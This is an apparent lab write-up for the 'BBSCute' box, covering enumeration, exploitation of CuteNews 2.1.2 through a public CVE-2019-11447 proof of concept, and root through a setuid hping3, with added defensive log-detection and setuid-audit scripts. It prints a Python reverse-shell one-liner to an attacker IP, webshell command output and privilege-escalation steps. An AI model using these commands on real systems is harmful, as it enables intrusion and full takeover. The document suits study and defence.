# BBSCute - Easy

## Enumeration

### Nmap

```bash
┌─[sheinn101@parrot]─[~/offsec/BBSCute]
└──╼ [??]$ sudo nmap -sC -sV -oN nmap.out 192.168.129.128
Starting Nmap 7.92 ( https://nmap.org ) at 2021-11-07 08:56 +0630
Nmap scan report for 192.168.129.128
Host is up (0.29s latency).
Not shown: 995 closed tcp ports (reset)
PORT    STATE SERVICE  VERSION
22/tcp  open  ssh      OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey: 
|   2048 04:d0:6e:c4:ba:4a:31:5a:6f:b3:ee:b8:1b:ed:5a:b7 (RSA)
|   256 24:b3:df:01:0b:ca:c2:ab:2e:e9:49:b0:58:08:6a:fa (ECDSA)
|_  256 6a:c4:35:6a:7a:1e:7e:51:85:5b:81:5c:7c:74:49:84 (ED25519)
80/tcp  open  http     Apache httpd 2.4.38 ((Debian))
|_http-title: Apache2 Debian Default Page: It works
|_http-server-header: Apache/2.4.38 (Debian)
88/tcp  open  http     nginx 1.14.2
|_http-server-header: nginx/1.14.2
|_http-title: 404 Not Found
110/tcp open  pop3     Courier pop3d
|_pop3-capabilities: STLS LOGIN-DELAY(10) PIPELINING USER IMPLEMENTATION(Courier Mail Server) UTF8(USER) UIDL TOP
| ssl-cert: Subject: commonName=localhost/organizationName=Courier Mail Server/stateOrProvinceName=NY/countryName=US
| Subject Alternative Name: email:postmaster@example.com
| Not valid before: 2020-09-17T16:28:06
|_Not valid after:  2021-09-17T16:28:06
|_ssl-date: TLS randomness does not represent time
995/tcp open  ssl/pop3 Courier pop3d
|_pop3-capabilities: TOP LOGIN-DELAY(10) PIPELINING USER IMPLEMENTATION(Courier Mail Server) UTF8(USER) UIDL
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=localhost/organizationName=Courier Mail Server/stateOrProvinceName=NY/countryName=US
| Subject Alternative Name: email:postmaster@example.com
| Not valid before: 2020-09-17T16:28:06
|_Not valid after:  2021-09-17T16:28:06
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 34.67 seconds
```

### Directory Scanning

```bash
┌─[sheinn101@parrot]─[~/offsec/BBSCute]
└──╼ [??]$ sudo dirsearch -u http://192.168.129.128 -w /opt/SecLists/Discovery/Web-Content/common.txt -r -t 60 --full-url

  _|. _ _  _  _  _ _|_    v0.4.1
 (_||| _) (/_(_|| (_| )

Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 60 | Wordlist size: 4686

Output File: /usr/local/lib/python3.9/dist-packages/dirsearch-0.4.1-py3.9.egg/dirsearch/reports/192.168.129.128/_21-11-07_09-27-56.txt

Error Log: /usr/local/lib/python3.9/dist-packages/dirsearch-0.4.1-py3.9.egg/dirsearch/logs/errors-21-11-07_09-27-56.log

Target: http://192.168.129.128/

[09:27:57] Starting:
[09:28:14] 301 -  317B  - http://192.168.129.128/core  ->  http://192.168.129.128/core/     (Added to queue)
[09:28:16] 301 -  317B  - http://192.168.129.128/docs  ->  http://192.168.129.128/docs/     (Added to queue)
[09:28:17] 200 -    1KB - http://192.168.129.128/favicon.ico
[09:28:20] 200 -   10KB - http://192.168.129.128/index.html
[09:28:20] 200 -    6KB - http://192.168.129.128/index.php
[09:28:21] 301 -  317B  - http://192.168.129.128/libs  ->  http://192.168.129.128/libs/     (Added to queue)
[09:28:22] 301 -  319B  - http://192.168.129.128/manual  ->  http://192.168.129.128/manual/     (Added to queue)
[09:28:29] 403 -  280B  - http://192.168.129.128/server-status
[09:28:31] 301 -  318B  - http://192.168.129.128/skins  ->  http://192.168.129.128/skins/     (Added to queue)
[09:28:34] 301 -  320B  - http://192.168.129.128/uploads  ->  http://192.168.129.128/uploads/     (Added to queue)
[09:28:37] Starting: core/
[09:28:47] 301 -  325B  - http://192.168.129.128/core/captcha  ->  http://192.168.129.128/core/captcha/     (Added to queue)
[09:28:47] 301 -  326B  - http://192.168.129.128/core/ckeditor  ->  http://192.168.129.128/core/ckeditor/     (Added to queue)
[09:28:49] 301 -  320B  - http://192.168.129.128/core/db  ->  http://192.168.129.128/core/db/     (Added to queue)
[09:28:54] 301 -  326B  - http://192.168.129.128/core/includes  ->  http://192.168.129.128/core/includes/     (Added to queue)
[09:28:55] 200 -    0B  - http://192.168.129.128/core/index.html
[09:28:56] 301 -  322B  - http://192.168.129.128/core/lang  ->  http://192.168.129.128/core/lang/     (Added to queue)
[09:28:58] 301 -  325B  - http://192.168.129.128/core/modules  ->  http://192.168.129.128/core/modules/     (Added to queue)
[09:29:07] 301 -  323B  - http://192.168.129.128/core/tools  ->  http://192.168.129.128/core/tools/     (Added to queue)
```

### Web

Default install page for `Apache` on port `80`.

![](/files/ZUgKkkkfjZpAMs4vvFUd)

In `index.php`, we get a login page.

![](/files/GLR7LUwfh6ohxGityYxA)

I tried default credentials and some SQL injection, but nothing worked. So let's create a new user.

![](/files/QeLjO2NPHfIYPBzTebmN)

As you can see, we need a `Captcha` to register an account, but it does not load on the page.

But in the source code, we can see `captcha.php`.

![](/files/wux41JvavJOdaZ0Rnjty)

When we click on it, we get the `captcha` text.

![](/files/i0rUwu4bdUx8S45DEljQ)

We can use this `Captcha` to register accounts.

### Finding Exploit

![](/files/GSHD94vcE7n7YYMO4QdC)

At the bottom of the page, we can see that it is running `CuteNews 2.1.2`. When I googled this version, I found an exploit for it.

> <https://github.com/CRFSlick/CVE-2019-11447-POC>

Clone this repo and run it.

`python3 CVE-2019-11447.py <username> <pass> http://IP/index.php`

```
┌─[sheinn101@parrot]─[~/offsec/BBSCute/CVE-2019-11447-POC]
└──╼ [??]$ python3 CVE-2019-11447.py shein shein http://192.168.129.128/index.php
-.-. --- --- .-..    .... ....- -..- --- .-.    -... .- -. -. . .-.
[*] Detected version 'CuteNews 2.1.2'
[*] Grabbing session cookie
[*] Logging in as shein:shein
[+] Login Success!
[*] Grabbing __signature_key and __signature_dsi needed for pofile update request
[+] __signature_key: eb376c517713a1ebc76154a292a7044f-shein
[+] __signature_dsi: 7a551d498ea9f93dbe638fcfd9e71f34
[*] Uploading evil avatar... Done!
[*] Validating that the file was uploaded... Yup!
[+] http://192.168.129.128/uploads/avatar_shein_31095.php?cmd=<cmd>
[*] Looks like everything went smoothly, lets see if we have RCE!
[*] Keep in mind that this shell is limited, no STDERR

$> id
uid=33(www-data) gid=33(www-data) groups=33(www-data)

$>
```
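From the defender's side, the tell-tale artefact of this exploit is a request for a `.php` file under `/uploads/` (the avatar directory) carrying a `cmd` parameter, which is exactly the URL the PoC printed above. The Python below is an added example, not part of the original write-up or of the PoC repository: it parses Apache combined-format access log lines and flags such requests. The log lines are constructed for the example; the `/uploads/avatar_shein_31095.php?cmd=id` URL is the one the PoC reported, and the script-extension list is an assumption about which extensions the web server hands to PHP.

```python
import re
from urllib.parse import parse_qs, urlsplit

# Apache combined log format; the constructed sample lines below follow it.
LOG_RE = re.compile(
    r'^(?P<client>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" '
    r'(?P<status>\d{3}) '
)

UPLOAD_DIR = "/uploads/"                           # CuteNews avatar directory (seen above)
SCRIPT_EXTS = (".php", ".phtml", ".phar", ".php5")  # assumed set of extensions handed to PHP
SHELL_PARAM = "cmd"                                 # parameter the PoC webshell uses


def parse_line(line):
    """Return the fields of one access-log line, or None if it is malformed."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    parts = urlsplit(rec["target"])
    rec["path"] = parts.path
    rec["query"] = parse_qs(parts.query)
    return rec


def flag_upload_execution(lines):
    """Flag requests that try to execute a server-side script from the upload directory.

    Two independent signals are recorded per hit, so a renamed shell without a
    `cmd` parameter, or a `cmd` probe against a non-PHP name, still surfaces.
    """
    hits = []
    for line in lines:
        rec = parse_line(line)
        if rec is None or not rec["path"].lower().startswith(UPLOAD_DIR):
            continue
        reasons = []
        if rec["path"].lower().endswith(SCRIPT_EXTS):
            reasons.append("script extension under upload dir")
        if SHELL_PARAM in rec["query"]:
            reasons.append("webshell-style parameter %s=" % SHELL_PARAM)
        if reasons:
            hits.append({
                "client": rec["client"],
                "ts": rec["ts"],
                "path": rec["path"],
                "status": rec["status"],
                "executed": rec["status"].startswith("2"),  # 2xx means the script actually ran
                "reasons": reasons,
            })
    return hits


# Constructed sample log: a normal avatar image fetch, the profile-update POST,
# the first request to the uploaded shell, and an unrelated stylesheet request.
SAMPLE_LOG = """\
192.168.49.135 - - [07/Nov/2021:09:40:01 +0630] "GET /uploads/avatar_shein_31095.jpg HTTP/1.1" 200 1823 "-" "Mozilla/5.0"
192.168.49.135 - - [07/Nov/2021:09:40:05 +0630] "POST /index.php HTTP/1.1" 302 0 "-" "python-requests/2.25.1"
192.168.49.135 - - [07/Nov/2021:09:40:06 +0630] "GET /uploads/avatar_shein_31095.php?cmd=id HTTP/1.1" 200 61 "-" "python-requests/2.25.1"
192.168.49.135 - - [07/Nov/2021:09:41:12 +0630] "GET /skins/main.css HTTP/1.1" 200 4410 "-" "Mozilla/5.0"
"""

if __name__ == "__main__":
    for hit in flag_upload_execution(SAMPLE_LOG.splitlines()):
        print(hit["ts"], hit["client"], hit["path"], hit["status"], "; ".join(hit["reasons"]))
```

Run it over `/var/log/apache2/access.log` on the web host. A hit with `executed` set means the uploaded file was interpreted as PHP, which is the condition the avatar upload should have prevented by rejecting non-image extensions and by serving the upload directory with script execution turned off.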

### Getting Reverse Shell

Now we have a shell. To get a stable shell, listen with `netcat` and run the following command:

```
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.49.135",9001));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn("/bin/sh")'
```

```
┌─[sheinn101@parrot]─[~/offsec/BBSCute]
└──╼ [??]$ rlwrap nc -nvlp 9001
listening on [any] 9001 ...
connect to [192.168.49.135] from (UNKNOWN) [192.168.135.128] 35872
which python
which python
/usr/bin/python
python3 -c 'import pty;pty.spawn("/bin/bash")'
python3 -c 'import pty;pty.spawn("/bin/bash")'
www-data@cute:/var/www/html/uploads$
```

Now we have a stable shell. As this is an easy box, let's find which binaries have the `SUID` bit set.

### Privilege Escalation

```
find / -perm -4000 2>/dev/null
find / -perm -4000 2>/dev/null
/usr/bin/chsh
/usr/bin/chfn
/usr/bin/gpasswd
/usr/bin/su
/usr/bin/pkexec
/usr/bin/sudo
/usr/bin/umount
/usr/bin/newgrp
/usr/bin/fusermount
/usr/bin/passwd
/usr/bin/mount
/usr/sbin/hping3
/usr/lib/policykit-1/polkit-agent-helper-1
/usr/lib/openssh/ssh-keysign
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/eject/dmcrypt-get-device
www-data@cute:/home/fox$
```

We can see that `hping3` has the `SUID` bit set. Looking up `hping3` on [GTFOBins](https://gtfobins.github.io/gtfobins/hping3/#sudo), we see the following:

![](/files/IDpslKZjWc45Ju0t75jm)

`hping3` already has the `SUID` bit set, so we don't need `sudo`. Run `hping3` and type `/bin/bash -p`.

```
hping3
/bin/bash -p
/bin/bash -p
id; whoami
id; whoami
uid=33(www-data) gid=33(www-data) euid=0(root) egid=0(root) groups=0(root),33(www-data)
root
bash-5.0#
```
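What makes this box fall is not `hping3` itself but the fact that a packet-crafting tool able to spawn a shell carries the setuid bit, which its package does not set by default. The Python below is an added example, not code from the write-up: it reimplements the `find / -perm -4000` sweep with `os.walk` and `lstat` so it runs as an unprivileged user, then diffs the result against a baseline. The baseline used here is the list printed above with `/usr/sbin/hping3` removed, treated as the known-good set for this host (an assumption for the example; on a real fleet the baseline comes from a clean image of the same release).

```python
import os
import stat

# Known-good setuid binaries for this host: the `find / -perm -4000` output
# above minus /usr/sbin/hping3 (assumed baseline for the example).
SUID_BASELINE = {
    "/usr/bin/chsh", "/usr/bin/chfn", "/usr/bin/gpasswd", "/usr/bin/su",
    "/usr/bin/pkexec", "/usr/bin/sudo", "/usr/bin/umount", "/usr/bin/newgrp",
    "/usr/bin/fusermount", "/usr/bin/passwd", "/usr/bin/mount",
    "/usr/lib/policykit-1/polkit-agent-helper-1",
    "/usr/lib/openssh/ssh-keysign",
    "/usr/lib/dbus-1.0/dbus-daemon-launch-helper",
    "/usr/lib/eject/dmcrypt-get-device",
}

# Pseudo-filesystems that hold no real binaries and only slow the walk down.
SKIP_DIRS = {"/proc", "/sys", "/dev", "/run"}


def find_suid(root="/"):
    """Return regular files under root whose setuid bit is set
    (equivalent to `find root -perm -4000 -type f`).

    Symlinks are not followed and unreadable directories are skipped, so the
    walk works without root; the result is sorted to give stable diffs.
    """
    found = []
    for dirpath, dirnames, filenames in os.walk(root, onerror=lambda err: None):
        dirnames[:] = [d for d in dirnames if os.path.join(dirpath, d) not in SKIP_DIRS]
        for name in filenames:
            path = os.path.join(dirpath, name)
            try:
                st = os.lstat(path)  # lstat: never dereference a link
            except OSError:
                continue
            if stat.S_ISREG(st.st_mode) and st.st_mode & stat.S_ISUID:
                found.append(path)
    return sorted(found)


def unexpected_suid(paths, baseline=SUID_BASELINE):
    """Setuid files that are not in the baseline: each one is a finding to review."""
    return sorted(set(paths) - set(baseline))


if __name__ == "__main__":
    for path in unexpected_suid(find_suid("/")):
        print("unexpected setuid binary:", path)
```

On this box the script reports `/usr/sbin/hping3`; the fix is `chmod u-s /usr/sbin/hping3` (or removing the package), and re-running the audit on a schedule catches the bit if it is set again.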

Now we pwned it.

![](/files/UMswqkJjkI4wMFflqvdz)

